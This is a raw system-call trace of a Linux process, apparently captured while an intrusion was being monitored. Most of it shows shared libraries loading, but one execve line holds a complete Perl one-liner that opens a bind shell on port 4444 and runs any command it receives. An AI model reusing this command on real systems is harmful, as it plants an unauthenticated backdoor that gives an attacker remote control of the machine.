\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
9928  20:01:20.766613 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
9928  20:01:20.766653 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e02000
9928  20:01:20.766665 mmap2(0xb7e09000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e09000
9928  20:01:20.766686 close(1)          = 0
9928  20:01:20.766698 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.766711 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
9928  20:01:20.766726 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
9928  20:01:20.766813 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
9928  20:01:20.766837 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dea000
9928  20:01:20.766849 mmap2(0xb7dfe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dfe000
9928  20:01:20.766865 mmap2(0xb7e00000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e00000
9928  20:01:20.766880 close(1)          = 0
9928  20:01:20.766910 munmap(0xb7f90000, 29913) = 0
9928  20:01:20.766928 open("/etc/ld.so.cache", O_RDONLY) = 1
9928  20:01:20.766941 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9928  20:01:20.766958 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f90000
9928  20:01:20.766967 close(1)          = 0
9928  20:01:20.766978 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.766993 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
9928  20:01:20.767007 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
9928  20:01:20.767106 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
9928  20:01:20.767123 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de0000
9928  20:01:20.767135 mmap2(0xb7de8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de8000
9928  20:01:20.767153 close(1)          = 0
9928  20:01:20.767165 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9928  20:01:20.767179 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
9928  20:01:20.767194 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
9928  20:01:20.767283 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
9928  20:01:20.767300 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd5000
9928  20:01:20.767311 mmap2(0xb7dde000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dde000
9928  20:01:20.767328 close(1)          = 0
9928  20:01:20.767353 munmap(0xb7f90000, 29913) = 0
9928  20:01:20.767370 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
9928  20:01:20.767384 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
9928  20:01:20.767397 _llseek(1, 0, [0], SEEK_CUR) = 0
9928  20:01:20.767409 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
9928  20:01:20.767425 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f97000
9928  20:01:20.767436 _llseek(1, 1624, [1624], SEEK_SET) = 0
9928  20:01:20.767452 munmap(0xb7f97000, 1624) = 0
9928  20:01:20.767461 close(1)          = 0
9928  20:01:20.767494 getpgrp()         = 3831
9928  20:01:20.767505 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
9928  20:01:20.767521 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
9928  20:01:20.767547 brk(0x8101000)    = 0x8101000
9928  20:01:20.767624 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.767640 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.767654 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9928  20:01:20.767693 brk(0x8102000)    = 0x8102000
9928  20:01:20.767721 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9928  20:01:20.767741 stat64("/sbin/AB", 0xbff985e8) = -1 ENOENT (No such file or directory)
9928  20:01:20.767755 stat64("/bin/AB", 0xbff985e8) = -1 ENOENT (No such file or directory)
9928  20:01:20.767766 stat64("/usr/sbin/AB", 0xbff985e8) = -1 ENOENT (No such file or directory)
9928  20:01:20.767778 stat64("/usr/bin/AB", 0xbff985e8) = -1 ENOENT (No such file or directory)
9928  20:01:20.767792 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
9928  20:01:20.767820 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0b6f8) = 9929
9929  20:01:20.836216 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9929  20:01:20.836227 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
9929  20:01:20.836242 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
9929  20:01:20.836254 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
9929  20:01:20.836270 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9929  20:01:20.836287 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
9929  20:01:20.836300 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
9929  20:01:20.836366 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
9929  20:01:20.836381 --- SIGPIPE (Broken pipe) @ 0 (0) ---
9929  20:01:20.836467 exit_group(127)   = ?
9928  20:01:21.126619 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:01:21.126725 waitpid(9928,  <unfinished ...>
9928  20:01:21.126782 <... rt_sigprocmask resumed> NULL, 8) = 0
9928  20:01:21.186259 --- SIGCHLD (Child exited) @ 0 (0) ---
9928  20:01:21.186259 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 9929
9928  20:01:21.186286 waitpid(-1, 0xbff98268, WNOHANG) = -1 ECHILD (No child processes)
9928  20:01:21.186298 sigreturn()       = ? (mask now [])
9928  20:01:21.186323 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
9928  20:01:21.186339 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9928  20:01:21.186350 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
9928  20:01:21.186362 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
9928  20:01:21.186381 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9928  20:01:21.186392 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
9928  20:01:21.186428 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9928  20:01:21.186449 stat64("/sbin/perl", 0xbff98618) = -1 ENOENT (No such file or directory)
9928  20:01:21.186462 stat64("/bin/perl", 0xbff98618) = -1 ENOENT (No such file or directory)
9928  20:01:21.186473 stat64("/usr/sbin/perl", 0xbff98618) = -1 ENOENT (No such file or directory)
9928  20:01:21.186485 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
9928  20:01:21.186503 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
9928  20:01:21.186528 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
9928  20:01:21.186542 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0b6f8) = 9930
9930  20:01:21.236188 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9930  20:01:21.236223 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
9930  20:01:21.236237 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
9930  20:01:21.236250 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
9930  20:01:21.236265 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9930  20:01:21.236282 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
9930  20:01:21.236295 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
9930  20:01:21.236334 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
9930  20:01:21.236441 brk(0)            = 0x8153000
9930  20:01:21.236462 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.236480 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc0000
9930  20:01:21.236496 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.236514 open("/etc/ld.so.cache", O_RDONLY) = 1
9930  20:01:21.236527 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9930  20:01:21.236546 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb8000
9930  20:01:21.236556 close(1)          = 0
9930  20:01:21.236567 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.236583 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
9930  20:01:21.236598 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
9930  20:01:21.236703 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
9930  20:01:21.236722 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fb4000
9930  20:01:21.236734 mmap2(0xb7fb6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fb6000
9930  20:01:21.236751 close(1)          = 0
9930  20:01:21.236763 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.236777 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
9930  20:01:21.236792 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
9930  20:01:21.236886 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
9930  20:01:21.236904 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8f000
9930  20:01:21.236916 mmap2(0xb7fb2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fb2000
9930  20:01:21.236932 close(1)          = 0
9930  20:01:21.236944 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.236958 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
9930  20:01:21.236972 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
9930  20:01:21.237061 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
9930  20:01:21.237078 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8e000
9930  20:01:21.237090 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f76000
9930  20:01:21.237102 mmap2(0xb7f8a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f8a000
9930  20:01:21.237116 mmap2(0xb7f8c000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f8c000
9930  20:01:21.237137 close(1)          = 0
9930  20:01:21.237151 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.237164 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
9930  20:01:21.237178 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
9930  20:01:21.237268 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
9930  20:01:21.237290 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e27000
9930  20:01:21.237302 mmap2(0xb7f70000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f70000
9930  20:01:21.237317 mmap2(0xb7f73000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f73000
9930  20:01:21.237330 close(1)          = 0
9930  20:01:21.237342 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9930  20:01:21.237356 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1
9930  20:01:21.237370 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 